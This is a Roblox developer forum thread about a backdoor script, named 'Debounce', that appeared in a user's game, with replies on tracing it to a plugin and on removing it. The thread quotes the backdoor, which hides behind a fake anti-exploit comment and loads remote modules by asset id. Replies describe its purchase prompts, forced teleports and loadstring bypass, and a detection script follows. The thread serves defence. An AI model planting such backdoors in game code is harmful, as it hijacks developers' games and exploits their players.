I don’t know what category I should put this post under because nothing really suits it.
Hello! I’m Koala_Helper.
What I want to achieve is finding the answer to how this happened. I have plugins that I trust really well.
The issue I am experiencing is that I inserted a part into the workspace using the way you would always do it, and like two days later a script, which I figured out is what made the virus possible, a debounce script, appeared in the part I inserted. I have plugins that I trust a lot. I’ve used them for a while and no problems have happened.
I haven’t tried any solutions so far because I just want to figure out how this happened.
This is the script that was inside that virus script.
--This an script of ROBLOX Studio. Do not delete it, this script secures your game from exploiters.
--Thanks.
local mymodule2 = require(3667797501)
mymodule2.antiexploit()
wait(2)
local mymodule = require(3664252382)
mymodule.antibackdoor()
Does anybody know what can cause this?
Again, sorry if this is under the wrong category. None really suits this.
I use: Official building tools plugin, Auto anchor (I’ve used it for 8 months and nothing has gone wrong), Roundify, and the Tower of Hell plugin where you can create a section for that game. I’ve had no problems with these plugins before.
Just in case you fail to remove the back door, you can have a simple script that checks if there is a script named ‘Debounce’ in the part and then deletes it.
-- Search every descendant of workspace so scripts nested inside parts are found
for _, v in pairs(workspace:GetDescendants()) do
	if v:IsA("Script") and v.Name == "Debounce" then
		v:Destroy()
	end
end
My friend @TheeDeathCaster made a plugin that allows you to look into different plugins and see their code and what they are composed of. I am pretty sure that if there is a script in the plugin with that exact same message, then it is the plugin that creates those messages.
I think your best bet is probably to manually search the plugins for the malicious script…
Firstly, temporarily disable each plugin you have, move your local plugins out of their folder, and reload Studio. This should make it so no plugins run, and you can open a Baseplate map. (You’ll need to keep track of which plugins are which, by the way; you can name them if you want.) Then drop each rbxm/rbxmx into Studio, as well as those from your downloaded plugins folder. Note: Your downloaded plugins are in %LocalAppdata%\Roblox\<your userId>\<plugin id>
Once you’ve done that, use Ctrl+Shift+F to open a find window, type something from one of the malicious scripts, for example --This an script of ROBLOX Studio. and hit search. It should show every script that has that phrase. Then all you should need to do is click on one of the scripts it found and see what plugin it’s a part of. If you see no results, look through the plugins you trust the least for any weird or obfuscated code.
If you still can’t find anything, you can PM me your plugins and I can look at them myself and see what I find if you’re alright doing that.
I found what this ultimately leads back to; it spans multiple modules and even another free model. The end module is named XD by ModelBoyJoeXD. I can’t really read the obfuscated scripts, but luckily some weren’t obfuscated. What this module does (and is not limited to) is teleport players back into the game if they’re beginning a teleport, and prompt the purchase of an item when they join. As per the items being prompted for purchase, they are game passes that come from this game. I’m not too sure if this is 100% on topic, but I thought it would be good to note what this backdoor does.
Just as others have recommended, look into your plugins - it could be that you have a bad one, and look into any free models you may have inserted. Thanx @greatneil80 for sharing my plugin lol
EDIT
I looked into the other scripts (man, there’s a lot), and the results are, uh, scary to say the least. There are multiple scripts where, when a 6th player enters the game, they’re teleported to this game named Loading. This also contains a loadstring bypasser where an exploiter can execute code regardless of whether LoadStringEnabled is on or not.
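The manual search described in the replies above can also be scripted. The following is an added example, not code from any poster in this thread: a read-only audit for the Studio command bar that reports scripts which require a module by numeric asset id, contain the fake notice quoted above, mention loadstring, or are named Debounce. The service list and the function names are choices made for this example, and it assumes it runs in Studio, where the command bar can read a script's Source.

```lua
-- Added example: read-only audit, meant for the Roblox Studio command bar.
-- Assumption: runs in Studio, where the command bar may read Script.Source.
local MARKER = "This an script of ROBLOX Studio" -- phrase quoted in this thread
local SERVICES = { "Workspace", "ServerScriptService", "ServerStorage",
	"ReplicatedStorage", "ReplicatedFirst", "StarterGui", "StarterPack",
	"StarterPlayer", "Lighting" } -- containers chosen for this example

-- Returns a list of reasons why this source text deserves a manual look.
local function inspectSource(source)
	local reasons = {}
	-- require(<number>) pulls a ModuleScript by asset id at run time,
	-- so the code that actually executes is not visible in the place file.
	for id in source:gmatch("require%s*%(%s*(%d+)%s*%)") do
		table.insert(reasons, "require by asset id " .. id)
	end
	if source:find(MARKER, 1, true) then
		table.insert(reasons, "contains the fake 'ROBLOX Studio' notice")
	end
	if source:find("loadstring", 1, true) then
		table.insert(reasons, "mentions loadstring")
	end
	return reasons
end

local function audit()
	local flagged = 0
	for _, serviceName in ipairs(SERVICES) do
		local ok, service = pcall(game.GetService, game, serviceName)
		if ok and service then
			for _, inst in ipairs(service:GetDescendants()) do
				if inst:IsA("LuaSourceContainer") then
					-- Reading Source can fail outside Studio; treat that as "no findings".
					local readOk, source = pcall(function() return inst.Source end)
					local reasons = readOk and inspectSource(source) or {}
					if inst.Name == "Debounce" then
						table.insert(reasons, "named Debounce, as in this thread")
					end
					if #reasons > 0 then
						flagged = flagged + 1
						warn(inst:GetFullName() .. ": " .. table.concat(reasons, "; "))
					end
				end
			end
		end
	end
	print(("Audit finished, %d script(s) flagged for review"):format(flagged))
end

audit()
```

Nothing is deleted; each warning gives the full path of a script to open and read. Plugin files dropped into the Workspace as described above are covered by the same scan, and a hit on the name or on loadstring alone is only a prompt to review, since legitimate scripts can match.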